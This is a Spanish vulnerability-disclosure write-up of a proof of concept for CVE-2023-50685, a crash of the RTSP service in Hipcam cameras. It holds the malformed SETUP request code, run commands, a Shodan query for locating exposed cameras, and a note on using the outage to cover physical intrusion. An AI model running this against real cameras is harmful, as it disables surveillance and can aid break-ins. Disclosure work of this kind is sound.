
Este POC explota una vulnerabilidad de validación de formato en el servicio RTSP de Hipcam RealServer/V1.0, provocando un fallo durante aproximadamente 45 segundos al inyectar datos aleatorios en el parámetro 'client_port' durante la solicitud RTSP SETUP. Hipcam RealServer/V1.0 se utiliza en muchas cámaras Hipcam. | CVE-2023-50685
Prueba de concepto de la vulnerabilidad de validación de formato del servicio RTSP en Hipcam RealServer/V1.0.
Esta PoC explota una vulnerabilidad de validación de formato en el servicio de Protocolo de Streaming en Tiempo Real (RTSP) de Hipcam RealServer/V1.0, derivada de una validación y manejo inadecuados del parámetro 'client_port' en la solicitud RTSP SETUP.
El parámetro 'client_port' en la solicitud RTSP SETUP se manipula, induciendo una vulnerabilidad en la validación de formato del servidor RTSP. A diferencia de los exploits convencionales con un valor de desbordamiento específico, esta vulnerabilidad se desencadena por un formato incorrecto, particularmente cuando 'client_port' no está en el formato esperado (p. ej., client_port=[custom_port]-[custom_port+1]). Las vulnerabilidades de validación de formato ocurren cuando una aplicación no valida o maneja adecuadamente la entrada, lo que potencialmente conduce a un comportamiento inesperado. En este caso, el objetivo es interrumpir el servicio.
cam_address = "rtsp://120.75.111.XX:554/11" #The RTSP port is normaly 554 with the path /11 which is also normaly used in Hipcam Cameras
random_data_value = 8712429 #It can be anything except the correct format of [custom_port]-[custom_port+1]
rtsp_request = f"SETUP {cam_address}/trackID=1 RTSP/1.0\r\nCSeq: 3\r\nTransport: RTP/AVP;unicast;client_port={random_data_value}\r\n\r\n"
python3 poc.py 120.75.111.XX 554
python3 poc.py -h
Ante una explotación exitosa, la transmisión RTSP se desconecta durante aproximadamente 45 segundos. Esta interrupción podría aprovecharse en escenarios de ataque físico donde la indisponibilidad temporal de las imágenes de vigilancia pueda proporcionar una oportunidad para acceso no autorizado u otras actividades maliciosas.
Línea de tiempo

Países

Para más información sobre la tendencia de Shodan de Hipcam RealServer, consulte Tendencias de Shodan.
Consulta de búsqueda utilizada: has_screenshot:true port:554 "Hipcam RealServer/V1.0".
Este script tiene fines exclusivamente educativos y de divulgación responsable. El uso no autorizado de este script en sistemas sin la debida autorización es ilegal y poco ético. El usuario es responsable de garantizar el cumplimiento de las normas legales y éticas.